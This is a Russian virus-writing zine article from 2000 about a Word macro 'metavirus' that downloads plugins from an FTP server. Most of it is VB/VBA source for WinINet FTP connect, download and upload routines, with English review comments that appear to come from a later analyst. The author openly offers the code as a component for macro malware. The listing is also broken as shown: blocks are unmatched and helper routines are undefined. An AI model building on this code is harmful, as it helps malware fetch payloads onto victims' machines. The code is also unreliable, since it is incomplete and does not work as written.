Метавирусы - 27:07 - by Ultras
 
В этой статье я попробую рассказать о подкачке вирусом дополнений из интернета для
макрозверей...

Всего несколько метавирусов было выпущено на свет; вирмакеры не стали писать таких вирей из-за того,
что это довольно геморно. Я тоже не смог написать такой вирус на asm один, и я решил написать этот
вирус с маленьким составом. При написании такого вируса я подумал: а почему на асме и только для win32?
И, выпив пивка, я решил написать макровирус с подкачкой. Мне хотелось чего-нибудь оригинального, и я решил сделать
это через FTP. Писал я это, пока пиво не закончилось; тут описан маленький кусок алгоритма. Это просто первая
попытка написать вирус под w0rd с плагинами.


									ULTRAS[MATRiX]
									  (c) 2000

Начало кода
~~~~~~~~~~~

Этот метод использует windoze api.


' WinINet import: FtpGetFile (ANSI entry point FtpGetFileA) retrieves a file
' from the FTP server into a local file. The article uses it to download the
' add-on ("plugin") file.
' NOTE(review): Declare statements that bind wininet.dll FTP functions inside
' an Office macro project are a useful thing to look for when triaging macro
' code, since ordinary documents rarely need them.

Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" _
  (ByVal hftpSession As Long, _
    ByVal lpszRemoteFile As String, _
    ByVal lpszNewFile As String, _
    ByVal fFailIfExists As Boolean, _
    ByVal dwFlagsAndAttributes As Long, _
    ByVal dwFlags As Long, _
    ByVal dwContext As Long) _
  As Boolean

' WinINet import: FtpPutFile (ANSI entry point FtpPutFileA) stores a local
' file on the FTP server. The original comment here repeated "download";
' this call is the upload direction and is the one PutFile uses.

Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" _
  (ByVal hftpSession As Long, _
    ByVal lpszLocalFile As String, _
    ByVal lpszRemoteFile As String, _
    ByVal dwFlags As Long, _
    ByVal dwContext As Long) _
  As Boolean

' The author lists the next two as APIs that may also be needed. Neither is
' called directly by the procedures in this listing.

Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" _
  Alias "FtpSetCurrentDirectoryA" _
  (ByVal hftpSession As Long, _
    ByVal lpszDirectory As String) _
  As Boolean
  
' lpdword is declared without ByVal, so VB passes it by reference.
Private Declare Function FtpGetCurrentDirectory Lib "wininet.dll" _
  Alias "FtpGetCurrentDirectoryA" _
  (ByVal hftpSession As Long, _
    ByVal lpszCurrentDirectory As String, _
    lpdword As Long) _
  As Boolean

' WinINet import: InternetOpen (InternetOpenA). The Long it returns is stored
' as the session handle by OpenSession, which treats 0 as failure.
Private Declare Function InternetOpen _
  Lib "wininet.dll" _
  Alias "InternetOpenA" _
  (ByVal sAgent As String, _
    ByVal lAccessType As Long, _
    ByVal sProxyName As String, _
    ByVal sProxyBypass As String, _
    ByVal lFlags As Long) _
  As Long

' Miscellaneous WinINet constants.
' Of everything declared in this block, the procedures in this listing
' reference only INTERNET_OPEN_TYPE_DIRECT, INTERNET_OPEN_TYPE_PROXY,
' INTERNET_INVALID_PORT_NUMBER, INTERNET_FLAG_PASSIVE, INTERNET_SERVICE_FTP
' and INTERNET_FLAG_RELOAD; the rest are carried along unused.

' Access types passed to InternetOpen (OpenSession uses DIRECT or PROXY).
Private Const INTERNET_OPEN_TYPE_PRECONFIG As Long = 0
Private Const INTERNET_OPEN_TYPE_DIRECT As Long = 1
Private Const INTERNET_OPEN_TYPE_PROXY As Long = 3
' Passed as the port argument of InternetConnect in Connect.
Private Const INTERNET_INVALID_PORT_NUMBER As Long = 0
' Transfer-type flag values. They are not referenced by name in this listing;
' u_lngTransferType is what GetFile and PutFile actually pass.
Private Const FTP_TRANSFER_TYPE_ASCII As Long = &H1
Private Const FTP_TRANSFER_TYPE_BINARY As Long = &H2
' Passed as the flags argument of InternetConnect in Connect.
Private Const INTERNET_FLAG_PASSIVE As Long = &H8000000

' WinINet import: InternetConnect (InternetConnectA). The Long it returns is
' stored as the connection handle by Connect, which treats 0 as failure.
' User name and password are plain String arguments.
Private Declare Function InternetConnect _
  Lib "wininet.dll" _
  Alias "InternetConnectA" _
  (ByVal hInternetSession As Long, _
    ByVal sServerName As String, _
    ByVal nServerPort As Integer, _
    ByVal sUsername As String, _
    ByVal sPassword As String, _
    ByVal lService As Long, _
    ByVal lFlags As Long, _
    ByVal lContext As Long) _
  As Long

' WinINet error codes, each expressed as an offset from INTERNET_ERROR_BASE
' (12000). None of them is compared against anything in this listing;
' GetDLLError only stores the raw Err.LastDLLError value.
Private Const INTERNET_ERROR_BASE = 12000
Private Const ERROR_INTERNET_OUT_OF_HANDLES As Long = (INTERNET_ERROR_BASE + 1)
Private Const ERROR_INTERNET_TIMEOUT As Long = (INTERNET_ERROR_BASE + 2)
Private Const ERROR_INTERNET_EXTENDED_ERROR As Long = (INTERNET_ERROR_BASE + 3)
Private Const ERROR_INTERNET_INTERNAL_ERROR As Long = (INTERNET_ERROR_BASE + 4)
Private Const ERROR_INTERNET_INVALID_URL As Long = (INTERNET_ERROR_BASE + 5)
Private Const ERROR_INTERNET_UNRECOGNIZED_SCHEME As Long = (INTERNET_ERROR_BASE + 6)
Private Const ERROR_INTERNET_NAME_NOT_RESOLVED As Long = (INTERNET_ERROR_BASE + 7)
Private Const ERROR_INTERNET_PROTOCOL_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 8)
Private Const ERROR_INTERNET_INVALID_OPTION As Long = (INTERNET_ERROR_BASE + 9)
Private Const ERROR_INTERNET_BAD_OPTION_LENGTH As Long = (INTERNET_ERROR_BASE + 10)
Private Const ERROR_INTERNET_OPTION_NOT_SETTABLE As Long = (INTERNET_ERROR_BASE + 11)
Private Const ERROR_INTERNET_SHUTDOWN As Long = (INTERNET_ERROR_BASE + 12)
Private Const ERROR_INTERNET_INCORRECT_USER_NAME As Long = (INTERNET_ERROR_BASE + 13)
Private Const ERROR_INTERNET_INCORRECT_PASSWORD As Long = (INTERNET_ERROR_BASE + 14)
Private Const ERROR_INTERNET_LOGIN_FAILURE As Long = (INTERNET_ERROR_BASE + 15)
Private Const ERROR_INTERNET_INVALID_OPERATION As Long = (INTERNET_ERROR_BASE + 16)
Private Const ERROR_INTERNET_OPERATION_CANCELLED As Long = (INTERNET_ERROR_BASE + 17)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_TYPE As Long = (INTERNET_ERROR_BASE + 18)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_STATE As Long = (INTERNET_ERROR_BASE + 19)
Private Const ERROR_INTERNET_NOT_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 20)
Private Const ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 21)
Private Const ERROR_INTERNET_BAD_REGISTRY_PARAMETER As Long = (INTERNET_ERROR_BASE + 22)
Private Const ERROR_INTERNET_NO_DIRECT_ACCESS As Long = (INTERNET_ERROR_BASE + 23)
Private Const ERROR_INTERNET_NO_CONTEXT As Long = (INTERNET_ERROR_BASE + 24)
Private Const ERROR_INTERNET_NO_CALLBACK As Long = (INTERNET_ERROR_BASE + 25)
Private Const ERROR_INTERNET_REQUEST_PENDING As Long = (INTERNET_ERROR_BASE + 26)
Private Const ERROR_INTERNET_INCORRECT_FORMAT As Long = (INTERNET_ERROR_BASE + 27)
Private Const ERROR_INTERNET_ITEM_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 28)
Private Const ERROR_INTERNET_CANNOT_CONNECT As Long = (INTERNET_ERROR_BASE + 29)
Private Const ERROR_INTERNET_CONNECTION_ABORTED As Long = (INTERNET_ERROR_BASE + 30)
Private Const ERROR_INTERNET_CONNECTION_RESET As Long = (INTERNET_ERROR_BASE + 31)
Private Const ERROR_INTERNET_FORCE_RETRY As Long = (INTERNET_ERROR_BASE + 32)
Private Const ERROR_INTERNET_INVALID_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 33)
Private Const ERROR_INTERNET_NEED_UI As Long = (INTERNET_ERROR_BASE + 34)
Private Const ERROR_INTERNET_HANDLE_EXISTS As Long = (INTERNET_ERROR_BASE + 36)
Private Const ERROR_INTERNET_SEC_CERT_DATE_INVALID As Long = (INTERNET_ERROR_BASE + 37)
Private Const ERROR_INTERNET_SEC_CERT_CN_INVALID As Long = (INTERNET_ERROR_BASE + 38)
Private Const ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR As Long = (INTERNET_ERROR_BASE + 39)
Private Const ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR As Long = (INTERNET_ERROR_BASE + 40)
Private Const ERROR_INTERNET_MIXED_SECURITY As Long = (INTERNET_ERROR_BASE + 41)
Private Const ERROR_INTERNET_CHG_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 42)
Private Const ERROR_INTERNET_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 43)
Private Const ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED As Long = (INTERNET_ERROR_BASE + 44)
Private Const ERROR_INTERNET_INVALID_CA As Long = (INTERNET_ERROR_BASE + 45)
Private Const ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP As Long = (INTERNET_ERROR_BASE + 46)
Private Const ERROR_INTERNET_ASYNC_THREAD_FAILED As Long = (INTERNET_ERROR_BASE + 47)
Private Const ERROR_INTERNET_REDIRECT_SCHEME_CHANGE As Long = (INTERNET_ERROR_BASE + 48)
Private Const ERROR_INTERNET_DIALOG_PENDING As Long = (INTERNET_ERROR_BASE + 49)
Private Const ERROR_INTERNET_RETRY_DIALOG As Long = (INTERNET_ERROR_BASE + 50)
Private Const ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR As Long = (INTERNET_ERROR_BASE + 52)
Private Const ERROR_INTERNET_INSERT_CDROM As Long = (INTERNET_ERROR_BASE + 53)

' FTP API Errors
Private Const ERROR_FTP_TRANSFER_IN_PROGRESS As Long = (INTERNET_ERROR_BASE + 110)
Private Const ERROR_FTP_DROPPED  As Long = (INTERNET_ERROR_BASE + 111)
Private Const ERROR_FTP_NO_PASSIVE_MODE  As Long = (INTERNET_ERROR_BASE + 112)


' Number of the TCP/IP port on the server to connect to.
' (Not referenced in this listing; Connect passes INTERNET_INVALID_PORT_NUMBER.)
Private Const INTERNET_DEFAULT_FTP_PORT As Long = 21
Private Const INTERNET_DEFAULT_GOPHER_PORT As Long = 70
Private Const INTERNET_DEFAULT_HTTP_PORT As Long = 80
Private Const INTERNET_DEFAULT_HTTPS_PORT As Long = 443
Private Const INTERNET_DEFAULT_SOCKS_PORT As Long = 1080

' Option identifiers; no option-setting call appears in this listing.
Private Const INTERNET_OPTION_CONNECT_TIMEOUT As Long = 2
Private Const INTERNET_OPTION_RECEIVE_TIMEOUT As Long = 6
Private Const INTERNET_OPTION_SEND_TIMEOUT As Long = 5

Private Const INTERNET_OPTION_USERNAME As Long = 28
Private Const INTERNET_OPTION_PASSWORD As Long = 29
Private Const INTERNET_OPTION_PROXY_USERNAME As Long = 43
Private Const INTERNET_OPTION_PROXY_PASSWORD As Long = 44

' Service selector for InternetConnect; Connect passes INTERNET_SERVICE_FTP.
Private Const INTERNET_SERVICE_FTP As Long = 1
Private Const INTERNET_SERVICE_GOPHER As Long = 2
Private Const INTERNET_SERVICE_HTTP As Long = 3

' INTERNET_FLAG_RELOAD is OR-ed into the FtpGetFile flags in GetFile; the
' other values below are not referenced in this listing.
Private Const INTERNET_FLAG_RELOAD As Long = &H80000000
Private Const INTERNET_FLAG_KEEP_CONNECTION As Long = &H400000
Private Const INTERNET_FLAG_MULTIPART As Long = &H200000
Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000

' WinINet import: FtpOpenFile (FtpOpenFileA). Declared but not called by the
' procedures in this listing.
Private Declare Function FtpOpenFile _
  Lib "wininet.dll" _
  Alias "FtpOpenFileA" _
  (ByVal hftpSession As Long, _
    ByVal sFileName As String, _
    ByVal lAccess As Long, _
    ByVal lFlags As Long, _
    ByVal lContext As Long) _
  As Long
    
' WinINet import: FtpDeleteFile (FtpDeleteFileA). Declared but not called by
' the procedures in this listing.
Private Declare Function FtpDeleteFile _
  Lib "wininet.dll" _
  Alias "FtpDeleteFileA" _
  (ByVal hftpSession As Long, _
    ByVal lpszFileName As String) _
  As Boolean

' WinINet import: InternetCloseHandle. Disconnect calls it on the connection
' handle and discards the return value.
Private Declare Function _
  InternetCloseHandle _
  Lib "wininet.dll" _
  (ByVal hInet As Long) _
  As Integer
  
' Private variables to support class properties
Private u_strProxyString As String      ' proxy string; read by OpenSession, not assigned in this listing
Private u_lngSessionHandle As Long      ' handle returned by InternetOpen
Private u_lngConnectionHandle As Long   ' handle returned by InternetConnect
Private u_fSessionActive As Boolean     ' True once Connect obtained a non-zero connection handle
Private u_strUserName As String         ' FTP user name, copied from txtUserName in Connect
Private u_strPassword As String         ' FTP password, copied from txtPassword in Connect (plain text)
Private u_strServer As String           ' FTP server name, copied from txtServer in Connect
Private u_lngTransferType  As Long      ' transfer-type flags used by GetFile/PutFile; not assigned in this listing
Private u_strLastDLLError As String     ' last Err.LastDLLError value, kept as text

' Connect to the FTP server.

Public Function Connect() As Boolean
  ' Comments  : Connects to the FTP server. Server name, user name and
  '             password are taken from txtServer, txtUserName and
  '             txtPassword, which are not declared in this listing.
  ' Returns   : True on success, False otherwise
  ' NOTE(review): the three "End If" lines further down have no matching
  '             "If" in the text as published, so the procedure is
  '             incomplete as shown.
  ' NOTE(review): the credentials are ordinary strings in the macro source
  '             and FTP sends them unencrypted, so both the document and a
  '             capture of the FTP control channel expose them to an analyst.

  Dim fConnected As Boolean
  On Error GoTo errorz

  ' Reset the state kept in the module-level variables.
  u_fSessionActive = False
  u_lngSessionHandle = 0
  u_lngConnectionHandle = 0


  u_strServer = txtServer ' server address
  u_strUserName = txtUserName ' user name
  u_strPassword = txtPassword ' password


  ' FTP service, passive-mode flag. The port argument is
  ' INTERNET_INVALID_PORT_NUMBER (0), which WinINet documents as "use the
  ' default port for the requested service".
  u_lngConnectionHandle = InternetConnect(u_lngSessionHandle, u_strServer, _
  INTERNET_INVALID_PORT_NUMBER, u_strUserName, u_strPassword, _
  INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0)
          
        ' Record the DLL error code of the call above.
        GetDLLError
        
        ' Check what came back
        If u_lngConnectionHandle <> 0 Then
          ' Connected: mark the session active
          fConnected = True
          u_fSessionActive = True
                      
        Else
          fConnected = False
        End If
      End If
    End If
  End If
      
  _ret:
  Connect = fConnected
  Exit Function
  
  ' Any runtime error shows a generic message box and returns through _ret.
errorz:
  MsgBox "Ошибка"
  resume _ret
End Function

' Disconnect from the FTP server.

Public Sub Disconnect()
  ' Comments  : Closes the FTP connection handle if one is open and marks
  '             the session inactive. Only u_lngConnectionHandle is closed
  '             here; u_lngSessionHandle is not touched.
  On Error GoTo errorz
  
  ' Disconnect only if we are connected to the FTP server
  If u_lngConnectionHandle <> 0 Then

    ClearDLLError
    
    ' Close the connection (the return value is ignored)
    InternetCloseHandle u_lngConnectionHandle
    
    ' Record the DLL error code
    GetDLLError
    
    ' Reset the connection handle
    u_lngConnectionHandle = 0
    
    ' Mark the session inactive
    u_fSessionActive = False
    
  End If

  _ret:
  Exit Sub
  
  ' Any runtime error shows a generic message box and returns through _ret.
errorz:
  MsgBox "Ошибка"
  Resume _ret
End Sub

' Resets the stored DLL error text to an empty string; called before each
' WinINet call whose error code is recorded afterwards.
Private Sub ClearDLLError()
  u_strLastDLLError = ""
End Sub


' Copies Err.LastDLLError into u_strLastDLLError (the number is stored as
' text because the variable is a String). Nothing in this listing reads the
' stored value back.
Private Sub GetDLLError()
  On Error GoTo errorz
  u_strLastDLLError = Err.LastDLLError
  
  _ret:
  Exit Sub
    
  ' Any runtime error shows a generic message box and returns through _ret.
errorz:
  MsgBox "Ошибка"
  Resume _ret
End Sub

Public Function OpenSession() As Boolean
  ' Comments  : Opens a WinINet session with InternetOpen and stores the
  '             handle in u_lngSessionHandle. The user-agent string comes
  '             from mcstrUserAgent, which is not declared in this listing.
  ' Returns   : True if the session opened succesfully, False otherwise

  Dim fOpened As Boolean
  
  On Error GoTo errorz
  
  ' Start from "not opened"
  fOpened = False
  
  ClearDLLError
  
  ' Direct access when no proxy string is set; otherwise go through the
  ' proxy named in u_strProxyString.
  If u_strProxyString = "" Then
    u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_DIRECT, _
    vbNullString, vbNullString, 0)
  Else
    u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_PROXY, _
    u_strProxyString, vbNullString, 0)
  End If
  
  ' Record the DLL error code
  GetDLLError
  
  ' A non-zero handle means the session was opened
  fOpened = (u_lngSessionHandle <> 0)
  
_ret:
  OpenSession = fOpened
  Exit Function
  
  ' Any runtime error shows a generic message box and returns through _ret.
errorz:
  MsgBox "Ошибка"
  Resume _ret
  
End Function

' File download, i.e. "download plugin"

Public Function GetFile( _
  strRemoteFile As String, _
  strLocalFile As String) _
  As Boolean
  ' Comments  : Downloads a file from the FTP server (the "plugin").
  ' Parameters: strRemoteFile - path and name of the file on the FTP server
  '             strLocalFile - path and name of the file to write locally
  ' Returns   : True on success, False otherwise (also False when the
  '             session is not active or either name is empty)
  ' NOTE(review): GetPathFromFTPPath, GetNameFromFTPPath, RemoteChDir and
  '             FILE_ATTRIBUTE_NORMAL are not defined in this listing.
  ' NOTE(review): nothing here checks what was downloaded. The local path is
  '             whatever the caller passes, so the location of the written
  '             file is decided outside this routine.

  Dim fRetval As Boolean
  Dim strFileOnRemote As String
  Dim strDirOnRemote As String

  On Error GoTo errorz
  
  ' Proceed only if the FTP session is active
  If u_fSessionActive Then
    
    ' Both file names must be non-empty
    If strRemoteFile <> "" And strLocalFile <> "" Then
      
      ' Split the remote path into directory and file name
      strDirOnRemote = GetPathFromFTPPath(strRemoteFile)
      strFileOnRemote = GetNameFromFTPPath(strRemoteFile)
            
      ' Change directory on the remote server
      RemoteChDir strDirOnRemote
      
      ClearDLLError
      
      ' Fetch the file. fFailIfExists is False, so an existing local file
      ' is replaced; the flags are INTERNET_FLAG_RELOAD combined with
      ' u_lngTransferType.
      fRetval = FtpGetFile(u_lngConnectionHandle, strFileOnRemote, _
        strLocalFile, False, FILE_ATTRIBUTE_NORMAL, _
        INTERNET_FLAG_RELOAD Or u_lngTransferType, 0)

      ' Record the DLL error code
      GetDLLError
      
    End If
    
  End If
  
  _ret:
  GetFile = fRetval
  Exit Function
    
  ' Any runtime error shows a generic message box and returns through _ret.
errorz:
MsgBox "Ошибка"
  Resume _ret
    
End Function

'Upload plugin

Public Function PutFile( _
  strLocalFile As String, _
  strRemoteFile As String) _
  As Boolean
  ' Comments  : Uploads a local file to the FTP server.
  ' Parameters: strLocalFile - path and name of the local file
  '             strRemoteFile - path and name for the file on the server
  '             (the original comment used the same wording for both)
  ' Returns   : True on success, False otherwise (also False when the
  '             session is not active or either name is empty)
  ' NOTE(review): RemoteChDir is not defined in this listing.
  '
  Dim fRetval As Boolean
  Dim strFileOnRemote As String
  Dim strDirOnRemote As String
  Dim strFileOnLocal As String
  Dim strTmp As String
  
  On Error GoTo errorz
  
  ' Proceed only if the FTP session is active
  If u_fSessionActive Then
    
    ' Both file names must be non-empty
    If strLocalFile <> "" And strRemoteFile <> "" Then
    
      ' Parse file names
      ' The remote directory is strRemoteFile with its first
      ' Len(u_strServer) characters dropped; presumably strRemoteFile is
      ' expected to start with the server name - TODO confirm.
      ' The remote file name passed on is the whole of strRemoteFile.
      strTmp = strRemoteFile
      strDirOnRemote = Right(strTmp, Len(strTmp) - Len(u_strServer))
      strFileOnRemote = strRemoteFile
      strFileOnLocal = strLocalFile
      
      ' Fall back to the root directory
      If (strDirOnRemote = "") Then
        strDirOnRemote = "/"
      End If
      
      ' Change to the required directory on the FTP server
      RemoteChDir strDirOnRemote
  
      ClearDLLError
      
      ' Send the file to the FTP server
      fRetval = FtpPutFile(u_lngConnectionHandle, strFileOnLocal, _
        strFileOnRemote, u_lngTransferType, 0)
        
      ' Record the DLL error code
      GetDLLError
      
    End If
    
  End If
  
  _ret:
  PutFile = fRetval
  Exit Function
    
  ' Any runtime error shows a generic message box and returns through _ret.
errorz:
  MsgBox "Ошибка"
  Resume _ret
  
End Function

Ну вот и все. Правда, может, я некоторые параметры не написал - влом мне проверять, пиво закончилось...
Некоторые опции я не описал, типа FtpSetCurrentDirectory, - там и так все ясно. Короче, идея есть, немного кода есть,
хватит, чтобы что-нибудь написать... Некоторые параметры придется изменить, так как писал я не в ворде, а в VB 6.0.

Могут быть глюки, они и у меня были, потому что я не все до конца отладил, но все-таки это работало.

				
						Just do it...

L0rd Ultra
(с) 2000